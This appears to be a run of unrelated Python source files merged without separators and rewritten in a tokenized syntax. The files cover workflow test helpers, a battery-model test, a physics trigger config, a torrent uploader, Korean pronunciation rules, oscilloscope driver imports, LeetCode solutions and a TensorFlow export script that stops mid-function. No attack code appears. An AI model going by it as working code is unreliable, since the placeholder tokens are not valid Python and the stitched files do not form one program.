<async_keyword><def_stmt>create_ok_artifact_for_task db task attempt=0<block_start>"Creates and returns a _task_ok artifact for a task"<line_sep>_task=(<await>add_artifact(db flow_id=task.get("flow_id") run_number=task.get("run_number") run_id=task.get("run_id") step_name=task.get("step_name") task_id=task.get("task_id") task_name=task.get("task_name") artifact={"name":"_task_ok" "location":"location" "ds_type":"ds_type" "sha":"sha" "type":"type" "content_type":"content_type" "attempt_id":attempt})).body<line_sep><return>_task<block_end><async_keyword><def_stmt>create_task db step=<none> status="running" task_id=<none> task_name=<none> last_heartbeat_ts=<none><block_start>"Creates and returns a task with specific status. Optionally creates the task for a specific step if provided."<if_stmt><not>step<block_start>_flow=(<await>add_flow(db flow_id="HelloFlow")).body<line_sep>_run=(<await>add_run(db flow_id=_flow.get("flow_id"))).body<line_sep>step=(<await>add_step(db flow_id=_run.get("flow_id") run_number=_run.get("run_number") step_name="step")).body<block_end>_task=(<await>add_task(db flow_id=step.get("flow_id") run_number=step.get("run_number") step_name=step.get("step_name") task_id=task_id task_name=task_name last_heartbeat_ts=last_heartbeat_ts)).body<line_sep>_task['status']=status<line_sep><return>_task<block_end><async_keyword><def_stmt>create_metadata_for_task db task metadata={} tags=<none><block_start>"Creates a metadata record for a task"<line_sep>_meta=(<await>add_metadata(db flow_id=task.get("flow_id") run_number=task.get("run_number") run_id=task.get("run_id") step_name=task.get("step_name") task_id=task.get("task_id") task_name=task.get("task_name") tags=tags metadata=metadata)).body<line_sep><return>_meta<block_end><async_keyword><def_stmt>create_task_attempt_metadata db task attempt=0<block_start>"Create 'attempt' metadata for a task"<line_sep><return><await>create_metadata_for_task(db task metadata={"type":"attempt" "field_name":"attempt" "value":str(attempt)})<block_end><async_keyword><def_stmt>create_task_attempt_done_metadata db task attempt:int=0<block_start>"Create 'attempt-done' metadata for a task"<line_sep><return><await>create_metadata_for_task(db task metadata={"type":"attempt-done" "field_name":"attempt-done" "value":str(attempt)})<block_end><async_keyword><def_stmt>create_task_attempt_ok_metadata db task attempt_id:int attempt_ok:bool=<false><block_start>"Create 'attempt_ok' metadata for a task"<line_sep><return><await>create_metadata_for_task(db task tags=["attempt_id:{attempt_id}".format(attempt_id=attempt_id)] metadata={"type":"internal_attempt_status" "field_name":"attempt_ok" "value":str(attempt_ok)})<block_end>
# # Tests for the standard parameters # <import_stmt>pybamm<import_stmt>unittest<class_stmt>TestGeometricParameters(unittest.TestCase)<block_start><def_stmt>test_macroscale_parameters self<block_start>geo=pybamm.geometric_parameters<line_sep>L_n=geo.L_n<line_sep>L_s=geo.L_s<line_sep>L_p=geo.L_p<line_sep>L_x=geo.L_x<line_sep>l_n=geo.l_n<line_sep>l_s=geo.l_s<line_sep>l_p=geo.l_p<line_sep>parameter_values=pybamm.ParameterValues(values={"Negative electrode thickness [m]":0.05 "Separator thickness [m]":0.02 "Positive electrode thickness [m]":0.21 })<line_sep>L_n_eval=parameter_values.process_symbol(L_n)<line_sep>L_s_eval=parameter_values.process_symbol(L_s)<line_sep>L_p_eval=parameter_values.process_symbol(L_p)<line_sep>L_x_eval=parameter_values.process_symbol(L_x)<line_sep>self.assertEqual((L_n_eval+L_s_eval+L_p_eval).evaluate() L_x_eval.evaluate())<line_sep>l_n_eval=parameter_values.process_symbol(l_n)<line_sep>l_s_eval=parameter_values.process_symbol(l_s)<line_sep>l_p_eval=parameter_values.process_symbol(l_p)<line_sep>self.assertAlmostEqual((l_n_eval+l_s_eval+l_p_eval).evaluate() 1)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>print("Add -v for more debug output")<import_stmt>sys<if_stmt>"-v"<in>sys.argv<block_start>debug=<true><block_end>pybamm.settings.debug_mode=<true><line_sep>unittest.main()<block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<import_from_stmt>L1TriggerConfig.DTTPGConfigProducers.L1DTTPGConfigFromDB_cff *<line_sep>dtTriggerPrimitiveDigis=cms.EDProducer("DTTrigProd" debug=cms.untracked.bool(<false>) # DT digis input tag digiTag=cms.InputTag("muonDTDigis") # Convert output into DTTF sector numbering: # false means [1-12] (useful for debug) # true is [0-11] useful as input for the DTTF emulator DTTFSectorNumbering=cms.bool(<true>) # config params for dumping of LUTs info from emulator lutBtic=cms.untracked.int32(31) lutDumpFlag=cms.untracked.bool(<false>))<line_sep>
# Reference: http://continuum.io/blog/the-python-and-the-complied-python #pythran export diffusePurePython(float [][], float [][], int) #runas import numpy as np;lx,ly=(2**7,2**7);u=np.zeros([lx,ly],dtype=np.double);u[int(lx/2),int(ly/2)]=1000.0;tempU=np.zeros([lx,ly],dtype=np.double);diffusePurePython(u,tempU,500) #bench import numpy as np;lx,ly=(2**6,2**6);u=np.zeros([lx,ly],dtype=np.double);u[int(lx/2),int(ly/2)]=1000.0;tempU=np.zeros([lx,ly],dtype=np.double);diffusePurePython(u,tempU,55) <import_stmt>numpy<as>np<def_stmt>diffusePurePython u tempU iterNum<block_start>""" Apply nested iteration for the Forward-Euler Approximation """<line_sep>mu=.1<line_sep>row=u.shape[0]<line_sep>col=u.shape[1]<for_stmt>n range(iterNum)<block_start><for_stmt>i range(1 row-1)<block_start><for_stmt>j range(1 col-1)<block_start>tempU[i j]=u[i j]+mu<times>(u[i+1 j]-2<times>u[i j]+u[i-1 j]+u[i j+1]-2<times>u[i j]+u[i j-1])<block_end><block_end><for_stmt>i range(1 row-1)<block_start><for_stmt>j range(1 col-1)<block_start>u[i j]=tempU[i j]<line_sep>tempU[i j]=0.0<block_end><block_end><block_end><block_end>
<import_stmt>asyncio<import_stmt>itertools<import_stmt>logging<import_stmt>random<import_stmt>time<import_from_stmt>typing List Iterable cast<import_from_stmt>torrent_client.algorithms.peer_manager PeerManager<import_from_stmt>torrent_client.models Peer TorrentInfo<import_from_stmt>torrent_client.utils humanize_size<class_stmt>Uploader<block_start><def_stmt>__init__ self torrent_info:TorrentInfo logger:logging.Logger peer_manager:PeerManager<block_start>self._download_info=torrent_info.download_info<line_sep>self._statistics=self._download_info.session_statistics<line_sep>self._logger=logger<line_sep>self._peer_manager=peer_manager<block_end>CHOKING_CHANGING_TIME=10<line_sep>UPLOAD_PEER_COUNT=4<line_sep>ITERS_PER_OPTIMISTIC_UNCHOKING=3<line_sep>CONNECTED_RECENTLY_THRESHOLD=60<line_sep>CONNECTED_RECENTLY_COEFF=3<def_stmt>_select_optimistically_unchoked self peers:Iterable[Peer]<arrow>Peer<block_start>cur_time=time.time()<line_sep>connected_recently=[]<line_sep>remaining_peers=[]<line_sep>peer_data=self._peer_manager.peer_data<for_stmt>peer peers<block_start><if_stmt>cur_time-peer_data[peer].connected_time<le>Uploader.CONNECTED_RECENTLY_THRESHOLD<block_start>connected_recently.append(peer)<block_end><else_stmt><block_start>remaining_peers.append(peer)<block_end><block_end>max_index=len(remaining_peers)+Uploader.CONNECTED_RECENTLY_COEFF<times>len(connected_recently)-1<line_sep>index=random.randint(0 max_index)<if_stmt>index<l>len(remaining_peers)<block_start><return>remaining_peers[index]<block_end><return>connected_recently[(index-len(remaining_peers))%len(connected_recently)]<block_end><def_stmt>get_peer_upload_rate self peer:Peer<arrow>int<block_start>data=self._peer_manager.peer_data[peer]<line_sep>rate=data.client.downloaded# We owe them for downloading <if_stmt>self._download_info.complete<block_start>rate<augadd>data.client.uploaded# To reach maximal upload speed <block_end><return>rate<block_end><async_keyword><def_stmt>execute self<block_start>prev_unchoked_peers=set()<line_sep>optimistically_unchoked=<none><for_stmt>i itertools.count()<block_start>peer_data=self._peer_manager.peer_data<line_sep>alive_peers=list(sorted(peer_data.keys() key=self.get_peer_upload_rate reverse=<true>))<line_sep>cur_unchoked_peers=set()<line_sep>interested_count=0<if_stmt>Uploader.UPLOAD_PEER_COUNT<block_start><if_stmt>i%Uploader.ITERS_PER_OPTIMISTIC_UNCHOKING<eq>0<block_start><if_stmt>alive_peers<block_start>optimistically_unchoked=self._select_optimistically_unchoked(alive_peers)<block_end><else_stmt><block_start>optimistically_unchoked=<none><block_end><block_end><if_stmt>optimistically_unchoked<is><not><none><and>optimistically_unchoked<in>peer_data<block_start>cur_unchoked_peers.add(optimistically_unchoked)<if_stmt>peer_data[optimistically_unchoked].client.peer_interested<block_start>interested_count<augadd>1<block_end><block_end><block_end><for_stmt>peer cast(List[Peer] alive_peers)<block_start><if_stmt>interested_count<eq>Uploader.UPLOAD_PEER_COUNT<block_start><break><block_end><if_stmt>peer_data[peer].client.peer_interested<block_start>interested_count<augadd>1<block_end>cur_unchoked_peers.add(peer)<block_end><for_stmt>peer prev_unchoked_peers-cur_unchoked_peers<block_start><if_stmt>peer<in>peer_data<block_start>peer_data[peer].client.am_choking=<true><block_end><block_end><for_stmt>peer cur_unchoked_peers<block_start>peer_data[peer].client.am_choking=<false><block_end>self._logger.debug('now %s peers are unchoked (total_uploaded = %s)' len(cur_unchoked_peers) humanize_size(self._statistics.total_uploaded))<line_sep><await>asyncio.sleep(Uploader.CHOKING_CHANGING_TIME)<line_sep>prev_unchoked_peers=cur_unchoked_peers<block_end><block_end><block_end>
<import_from_stmt>pylayers.antprop.aarray *<import_stmt>matplotlib.pyplot<as>plt<import_stmt>pdb<line_sep>print('--------------')<line_sep>print('antprop/test_subarray.py')<line_sep>print('--------------')<line_sep>fcGHz=60<line_sep>lamda=0.3/fcGHz<line_sep>N1=[4 4 1]<line_sep>N2=[2 2 1]<line_sep>dm1=[lamda/2. lamda/2. 0]<line_sep>dm2=[3<times>lamda 3<times>lamda 0]<line_sep>A1=AntArray(fGHz=np.array([fcGHz]) N=N1 dm=dm1 typant='Omni')<line_sep>A2=AntArray(fGHz=np.array([fcGHz]) N=N2 dm=dm2 array=A1)<line_sep>#A1.eval()
<import_from_stmt>..utils to_str<class_stmt>VertexCommand(object)<block_start><def_stmt>__init__ self command_text<block_start>self.command_text=command_text<block_end><def_stmt>__str__ self<block_start><return>to_str(self.__unicode__())<block_end><def_stmt>__unicode__ self<block_start><return>u'{}'.format(self.command_text)<block_end><block_end><class_stmt>CreateEdgeCommand(object)<block_start><def_stmt>__init__ self command_text<block_start>self.command_text=command_text<line_sep>self.retries=<none><block_end><def_stmt>__str__ self<block_start><return>to_str(self.__unicode__())<block_end><def_stmt>__unicode__ self<block_start><if_stmt>self.retries<block_start><return>u'{} RETRY {}'.format(self.command_text self.retries)<block_end><else_stmt><block_start><return>u'{}'.format(self.command_text)<block_end><block_end><def_stmt>retry self retries<block_start>self.retries=retries<line_sep><return>self<block_end><block_end>
# -*- coding: utf-8 -*- ''' Special rule for processing Hangul https://github.com/kyubyong/g2pK '''<import_stmt>re<import_from_stmt>g2pk.utils gloss get_rule_id2text<line_sep>rule_id2text=get_rule_id2text()<line_sep>############################ vowels ############################ <def_stmt>jyeo inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.1"]<line_sep># 일반적인 규칙으로 취급한다 by kyubyong out=re.sub("([ᄌᄍᄎ])ᅧ" r"\1ᅥ" inp)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>ye inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.2"]<line_sep># 실제로 언중은 예, 녜, 셰, 쎼 이외의 'ㅖ'는 [ㅔ]로 발음한다. by kyubyong <if_stmt>descriptive<block_start>out=re.sub("([ᄀᄁᄃᄄㄹᄆᄇᄈᄌᄍᄎᄏᄐᄑᄒ])ᅨ" r"\1ᅦ" inp)<block_end><else_stmt><block_start>out=inp<block_end>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>consonant_ui inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.3"]<line_sep>out=re.sub("([ᄀᄁᄂᄃᄄᄅᄆᄇᄈᄉᄊᄌᄍᄎᄏᄐᄑᄒ])ᅴ" r"\1ᅵ" inp)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>josa_ui inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.4.2"]<line_sep># 실제로 언중은 높은 확률로 조사 '의'는 [ㅔ]로 발음한다. <if_stmt>descriptive<block_start>out=re.sub("의/J" "에" inp)<block_end><else_stmt><block_start>out=inp.replace("/J" "")<block_end>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>vowel_ui inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["5.4.1"]<line_sep># 실제로 언중은 높은 확률로 단어의 첫음절 이외의 '의'는 [ㅣ]로 발음한다.""" <if_stmt>descriptive<block_start>out=re.sub("(\Sᄋ)ᅴ" r"\1ᅵ" inp)<block_end><else_stmt><block_start>out=inp<block_end>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>jamo inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["16"]<line_sep>out=inp<line_sep>out=re.sub("([그])ᆮᄋ" r"\1ᄉ" out)<line_sep>out=re.sub("([으])[ᆽᆾᇀᇂ]ᄋ" r"\1ᄉ" out)<line_sep>out=re.sub("([으])[ᆿ]ᄋ" r"\1ᄀ" out)<line_sep>out=re.sub("([으])[ᇁ]ᄋ" r"\1ᄇ" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<line_sep>############################ 어간 받침 ############################ <block_end><def_stmt>rieulgiyeok inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["11.1"]<line_sep>out=inp<line_sep>out=re.sub("ᆰ/P([ᄀᄁ])" r"ᆯᄁ" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>rieulbieub inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["25"]<line_sep>out=inp<line_sep>out=re.sub("([ᆲᆴ])/Pᄀ" r"\1ᄁ" out)<line_sep>out=re.sub("([ᆲᆴ])/Pᄃ" r"\1ᄄ" out)<line_sep>out=re.sub("([ᆲᆴ])/Pᄉ" r"\1ᄊ" out)<line_sep>out=re.sub("([ᆲᆴ])/Pᄌ" r"\1ᄍ" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>verb_nieun inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["24"]<line_sep>out=inp<line_sep>pairs=[("([ᆫᆷ])/Pᄀ" r"\1ᄁ") ("([ᆫᆷ])/Pᄃ" r"\1ᄄ") ("([ᆫᆷ])/Pᄉ" r"\1ᄊ") ("([ᆫᆷ])/Pᄌ" r"\1ᄍ") ("ᆬ/Pᄀ" "ᆫᄁ") ("ᆬ/Pᄃ" "ᆫᄄ") ("ᆬ/Pᄉ" "ᆫᄊ") ("ᆬ/Pᄌ" "ᆫᄍ") ("ᆱ/Pᄀ" "ᆷᄁ") ("ᆱ/Pᄃ" "ᆷᄄ") ("ᆱ/Pᄉ" "ᆷᄊ") ("ᆱ/Pᄌ" "ᆷᄍ")]<for_stmt>str1,str2 pairs<block_start>out=re.sub(str1 str2 out)<block_end>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>balb inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["10.1"]<line_sep>out=inp<line_sep>syllable_final_or_consonants="($|[^ᄋᄒ])"<line_sep># exceptions out=re.sub(f"(바)ᆲ({syllable_final_or_consonants})" r"\1ᆸ\2" out)<line_sep>out=re.sub(f"(너)ᆲ([ᄌᄍ]ᅮ|[ᄃᄄ]ᅮ)" r"\1ᆸ\2" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>palatalize inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["17"]<line_sep>out=inp<line_sep>out=re.sub("ᆮᄋ([ᅵᅧ])" r"ᄌ\1" out)<line_sep>out=re.sub("ᇀᄋ([ᅵᅧ])" r"ᄎ\1" out)<line_sep>out=re.sub("ᆴᄋ([ᅵᅧ])" r"ᆯᄎ\1" out)<line_sep>out=re.sub("ᆮᄒ([ᅵ])" r"ᄎ\1" out)<line_sep>gloss(verbose out inp rule)<line_sep><return>out<block_end><def_stmt>modifying_rieul inp descriptive=<false> verbose=<false><block_start>rule=rule_id2text["27"]<line_sep>out=inp<line_sep>pairs=[("ᆯ/E ᄀ" r"ᆯ ᄁ") ("ᆯ/E ᄃ" r"ᆯ ᄄ") ("ᆯ/E ᄇ" r"ᆯ ᄈ") ("ᆯ/E ᄉ" r"ᆯ ᄊ") ("ᆯ/E ᄌ" r"ᆯ ᄍ") ("ᆯ걸" "ᆯ껄") ("ᆯ밖에" "ᆯ빠께") ("ᆯ세라" "ᆯ쎄라") ("ᆯ수록" "ᆯ쑤록") ("ᆯ지라도" "ᆯ찌라도") ("ᆯ지언정" "ᆯ찌언정") ("ᆯ진대" "ᆯ찐대")]<for_stmt>str1,str2 pairs<block_start>out=re.sub(str1 str2 out)<block_end>gloss(verbose out inp rule)<line_sep><return>out<block_end>
""" Python Interchangeable Virtual Instrument Library Copyright (c) 2012-2017 <NAME> Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. """<line_sep># Oscilloscopes # DPO4000 <import_from_stmt>.tektronixDPO4032 tektronixDPO4032<import_from_stmt>.tektronixDPO4034 tektronixDPO4034<import_from_stmt>.tektronixDPO4054 tektronixDPO4054<import_from_stmt>.tektronixDPO4104 tektronixDPO4104<line_sep># MSO4000 <import_from_stmt>.tektronixMSO4032 tektronixMSO4032<import_from_stmt>.tektronixMSO4034 tektronixMSO4034<import_from_stmt>.tektronixMSO4054 tektronixMSO4054<import_from_stmt>.tektronixMSO4104 tektronixMSO4104<line_sep># DPO4000B <import_from_stmt>.tektronixDPO4014B tektronixDPO4014B<import_from_stmt>.tektronixDPO4034B tektronixDPO4034B<import_from_stmt>.tektronixDPO4054B tektronixDPO4054B<import_from_stmt>.tektronixDPO4102B tektronixDPO4102B<import_from_stmt>.tektronixDPO4104B tektronixDPO4104B<line_sep># MSO4000B <import_from_stmt>.tektronixMSO4014B tektronixMSO4014B<import_from_stmt>.tektronixMSO4034B tektronixMSO4034B<import_from_stmt>.tektronixMSO4054B tektronixMSO4054B<import_from_stmt>.tektronixMSO4102B tektronixMSO4102B<import_from_stmt>.tektronixMSO4104B tektronixMSO4104B<line_sep># MDO4000 <import_from_stmt>.tektronixMDO4054 tektronixMDO4054<import_from_stmt>.tektronixMDO4104 tektronixMDO4104<line_sep># MDO4000B <import_from_stmt>.tektronixMDO4014B tektronixMDO4014B<import_from_stmt>.tektronixMDO4034B tektronixMDO4034B<import_from_stmt>.tektronixMDO4054B tektronixMDO4054B<import_from_stmt>.tektronixMDO4104B tektronixMDO4104B<line_sep># MDO3000 <import_from_stmt>.tektronixMDO3012 tektronixMDO3012<import_from_stmt>.tektronixMDO3014 tektronixMDO3014<import_from_stmt>.tektronixMDO3022 tektronixMDO3022<import_from_stmt>.tektronixMDO3024 tektronixMDO3024<import_from_stmt>.tektronixMDO3032 tektronixMDO3032<import_from_stmt>.tektronixMDO3034 tektronixMDO3034<import_from_stmt>.tektronixMDO3052 tektronixMDO3052<import_from_stmt>.tektronixMDO3054 tektronixMDO3054<import_from_stmt>.tektronixMDO3102 tektronixMDO3102<import_from_stmt>.tektronixMDO3104 tektronixMDO3104<line_sep># Function Generators <import_from_stmt>.tektronixAWG2005 tektronixAWG2005<import_from_stmt>.tektronixAWG2020 tektronixAWG2020<import_from_stmt>.tektronixAWG2021 tektronixAWG2021<import_from_stmt>.tektronixAWG2040 tektronixAWG2040<import_from_stmt>.tektronixAWG2041 tektronixAWG2041<line_sep># Power Supplies <import_from_stmt>.tektronixPS2520G tektronixPS2520G<import_from_stmt>.tektronixPS2521G tektronixPS2521G<line_sep># Optical attenuators <import_from_stmt>.tektronixOA5002 tektronixOA5002<import_from_stmt>.tektronixOA5012 tektronixOA5012<import_from_stmt>.tektronixOA5022 tektronixOA5022<import_from_stmt>.tektronixOA5032 tektronixOA5032<line_sep># Current probe amplifiers <import_from_stmt>.tektronixAM5030 tektronixAM5030<line_sep>
<import_stmt>os<import_stmt>re<import_stmt>fnmatch<import_from_stmt>logfetch_base log is_in_date_range<import_from_stmt>termcolor colored<def_stmt>find_cached_logs args<block_start>matching_logs=[]<line_sep>log_fn_match=get_matcher(args)<for_stmt>filename os.listdir(args.dest)<block_start><if_stmt>fnmatch.fnmatch(filename log_fn_match)<and>in_date_range(args filename)<block_start>log(colored('Including log {0}\n'.format(filename) 'blue') args <true>)<line_sep>matching_logs.append('{0}/{1}'.format(args.dest filename))<block_end><else_stmt><block_start>log(colored('Excluding log {0}, not in date range\n'.format(filename) 'magenta') args <true>)<block_end><block_end><return>matching_logs<block_end><def_stmt>in_date_range args filename<block_start>timestamps=re.findall(r"-\d{13}-" filename)<if_stmt>timestamps<block_start><return>is_in_date_range(args int(str(timestamps[-1]).replace("-" "")[0:-3]))<block_end><else_stmt><block_start><return><true><block_end><block_end><def_stmt>get_matcher args<block_start><if_stmt>args.taskId<block_start><if_stmt>'filename'<in>args.file_pattern<and>args.logtype<block_start><return>'{0}*{1}*'.format(args.taskId args.logtype)<block_end><else_stmt><block_start><return>'{0}*'.format(args.taskId)<block_end><block_end><elif_stmt>args.deployId<and>args.requestId<block_start><if_stmt>'filename'<in>args.file_pattern<and>args.logtype<block_start><return>'{0}-{1}*{2}*'.format(args.requestId args.deployId args.logtype)<block_end><else_stmt><block_start><return>'{0}-{1}*'.format(args.requestId args.deployId)<block_end><block_end><else_stmt><block_start><if_stmt>'filename'<in>args.file_pattern<and>args.logtype<block_start><return>'{0}*{1}*'.format(args.requestId args.logtype)<block_end><else_stmt><block_start><return>'{0}*'.format(args.requestId)<block_end><block_end><block_end>
# 执行用时 : 348 ms # 内存消耗 : 13 MB # 方案:哈希表 <class_stmt>Solution(object)<block_start><def_stmt>twoSum self nums target<block_start>""" :type nums: List[int] :type target: int :rtype: List[int] """<line_sep># 创建哈希表{value:idx} record={}<line_sep># 遍数组 <for_stmt>idx,value enumerate(nums)# 如果差值在哈希表中,返回对应索引 以及 循环中本次idx # 如果差值不在,则在哈希表中插入该value:idx <block_start><if_stmt>(target-value)<in>record.keys()<block_start><return>[record[target-value] idx]<block_end><else_stmt><block_start>record[value]=idx<block_end><block_end><block_end><block_end>
<def_stmt>test_socfaker_application_status socfaker_fixture<block_start><assert_stmt>socfaker_fixture.application.status<in>['Active' 'Inactive' 'Legacy']<block_end><def_stmt>test_socfaker_application_account_status socfaker_fixture<block_start><assert_stmt>socfaker_fixture.application.account_status<in>['Enabled' 'Disabled']<block_end><def_stmt>test_socfaker_name socfaker_fixture<block_start><assert_stmt>socfaker_fixture.application.name<block_end><def_stmt>test_socfaker_application_logon_timestamp socfaker_fixture<block_start><assert_stmt>socfaker_fixture.application.logon_timestamp<block_end>
""" You are given an integer array nums and an integer k. In one operation, you can pick two numbers from the array whose sum equals k and remove them from the array. Return the maximum number of operations you can perform on the array.   Example 1: Input: nums = [1,2,3,4], k = 5 Output: 2 Explanation: Starting with nums = [1,2,3,4]: - Remove numbers 1 and 4, then nums = [2,3] - Remove numbers 2 and 3, then nums = [] There are no more pairs that sum up to 5, hence a total of 2 operations. Example 2: Input: nums = [3,1,3,4,3], k = 6 Output: 1 Explanation: Starting with nums = [3,1,3,4,3]: - Remove the first two 3's, then nums = [1,4,3] There are no more pairs that sum up to 6, hence a total of 1 operation.   Constraints: 1 <= nums.length <= 105 1 <= nums[i] <= 109 1 <= k <= 109 """<class_stmt>Solution<block_start><def_stmt>maxOperations self nums:List[int] k:int<arrow>int<block_start>c=collections.Counter(nums)<line_sep>r=0<for_stmt>n,v c.items()<block_start>t=k-n<if_stmt>t<not><in>c<block_start><continue><block_end><if_stmt>t<eq>n<block_start>m=v<floordiv>2<line_sep>r<augadd>m<line_sep>c[n]=v-m<line_sep><continue><block_end>m=min(v c[t])<line_sep>r<augadd>m<line_sep>c[n]=v-m<line_sep>c[t]=c[t]-m<block_end><return>r<block_end><block_end>
<import_from_future_stmt> absolute_import division print_function unicode_literals <import_from_stmt>operator itemgetter<def_stmt>fixdate ds<block_start>dmy=ds.split('/')<line_sep># BUG (!?): don't understand but stolen from ubs-ch-fr.py <return>'.'.join((dmy[1] dmy[0] dmy[2]))<block_end>mapping={'has_header':<true> 'date':<lambda>tr:fixdate(tr['Date']) 'amount':itemgetter('Amount (GBP)') 'desc':itemgetter('Reference') 'payee':itemgetter('Counter Party')}<line_sep>
<class_stmt>InterfaceWriter(object)<block_start><def_stmt>__init__ self output_path<block_start>self._output_path_template=output_path+'/_{key}_{subsystem}.i'<line_sep>self._fp={'pre':{} 'post':{} }<block_end><def_stmt>_write self key subsystem text<block_start>subsystem=subsystem.lower()<line_sep>fp=self._fp[key].get(subsystem)<if_stmt>fp<is><none><block_start>self._fp[key][subsystem]=fp=open(self._output_path_template.format(key=key subsystem=subsystem) 'w+')<block_end>fp.write(text)<line_sep>fp.write('\n')<block_end><def_stmt>write_pre self subsystem text<block_start>self._write('pre' subsystem text)<block_end><def_stmt>write_post self subsystem text<block_start>self._write('post' subsystem text)<block_end><def_stmt>close self<block_start><for_stmt>fp_map self._fp.values()<block_start><for_stmt>fp fp_map.values()<block_start>fp.close()<block_end><block_end><block_end><block_end>
<import_stmt>os<import_stmt>argparse<import_stmt>numpy<as>np<import_stmt>tensorflow<as>tf<import_from_stmt>tensorflow.python.platform gfile<import_from_stmt>tensorflow.python.framework dtypes<import_from_stmt>tensorflow.python.tools strip_unused_lib<line_sep>tf.enable_eager_execution()<line_sep>parser=argparse.ArgumentParser()<line_sep># export types parser.add_argument("--coreml" action="store_true")<line_sep>parser.add_argument("--tflite" action="store_true")<line_sep>parser.add_argument("--tfjs" action="store_true")<line_sep>parser.add_argument("--model-type" type=str)<line_sep># import paths parser.add_argument("--saved-model" type=str)<line_sep># export paths parser.add_argument("--mlmodel-path" type=str)<line_sep>parser.add_argument("--tflite-path" type=str)<line_sep>parser.add_argument("--tfjs-path" type=str)<line_sep>args=parser.parse_args()<def_stmt>print_header msg<block_start>print(" "<times>80)<line_sep>print("_"<times>80)<line_sep>print(msg)<block_end><def_stmt>print_footer msg<block_start>print(msg)<line_sep>print("_"<times>80)<line_sep>print(" "<times>80)<block_end><def_stmt>attempt_conversion model_type model_format<block_start><def_stmt>attempt_conversion convert<block_start><try_stmt><block_start>print_header(f"Converting {model_type} model to {model_format}")<line_sep>convert()<line_sep>print_footer(f"Successfully converted to {model_format}")<block_end><except_stmt>Exception<as>e<block_start>print(e)<line_sep>print_footer(f"Unable to convert to {model_format}")<block_end><block_end><return>attempt_conversion<block_end><def_stmt>get_anchors graph<block_start>""" Computes the list of anchor boxes by sending a fake image through the graph. Outputs an array of size (4, num_anchors) where each element is an anchor box given as [ycenter, xcenter, height, width] in normalized coordinates. """<with_stmt>tf.Session(graph=graph)<as>sess<block_start>anchors_tensor="Concatenate/concat:0"<line_sep>image_tensor=graph.get_tensor_by_name("image_tensor:0")<line_sep>box_corners_tensor=graph.get_tensor_by_name(anchors_tensor)<line_sep>box_corners=sess.run(box_corners_tensor feed_dict={image_tensor:np.zeros((1 300 300 3))})<line_sep># The TensorFlow graph gives each anchor box as [ymin, xmin, ymax, xmax]. # Convert these min/max values to a center coordinate, width and height. ymin,xmin,ymax,xmax=np.transpose(box_corners)<line_sep>width=xmax-xmin<line_sep>height=ymax-ymin<line_sep>ycenter=ymin+height/2.0<line_sep>xcenter=xmin+width/2.0<line_sep><return>np.stack([ycenter xcenter height width])<block_end><block_end><def_stmt>strip_and_freeze_model saved_model output_path input_node_names=[] output_node_names=[]<block_start>graph=tf.Graph()<with_stmt>tf.Session(graph=graph)<as>sess<block_start>print("loading model...")<line_sep>tf.saved_model.loader.load(sess [tf.saved_model.SERVING] saved_model)<line_sep>print("stripping unused ops...")<line_sep>gdef=strip_unused_lib.strip_unused(input_graph_def=tf.get_default_graph().as_graph_def() input_node_names=input_node_names output_node_names=output_node_names placeholder_type_enum=dtypes.float32.as_datatype_enum )<line_sep>gdef=tf.graph_util.convert_variables_to_constants(sess gdef output_node_names)<with_stmt>gfile.GFile(output_path "wb")<as>f<block_start>print("writing frozen model...")<line_sep>f.write(gdef.SerializeToString())<block_end><block_end><return>graph<block_end>os.makedirs(".tmp" exist_ok=<true>)<line_sep>################################################################################ # Object Detection ################################################################################ <if_stmt>args.model_type<eq>"localization"<block_start>labels_path=os.path.join(args.saved_model "labels.json")<line_sep>@attempt_conversion("object detection" "Core ML")<def_stmt>convert_object_detection_coreml <block_start><if_stmt>args.coreml<block_start><import_from_stmt>convert.convert_to_core_ml convert_localization<line_sep>frozen_model=".tmp/coreml_frozen_model.pb"<line_sep>graph=strip_and_freeze_model(saved_model=args.saved_model output_path=frozen_model input_node_names=["Preprocessor/sub"] output_node_names=["Squeeze" "Postprocessor/convert_scores"] )<line_sep>anchors=get_anchors(graph)<line_sep>convert_localization(frozen_model=frozen_model labels_path=labels_path output_path=args.mlmodel_path anchors=anchors )<block_end><block_end>@attempt_conversion("object detection" "TensorFlow Lite")<def_stmt>convert_object_detection_tflite 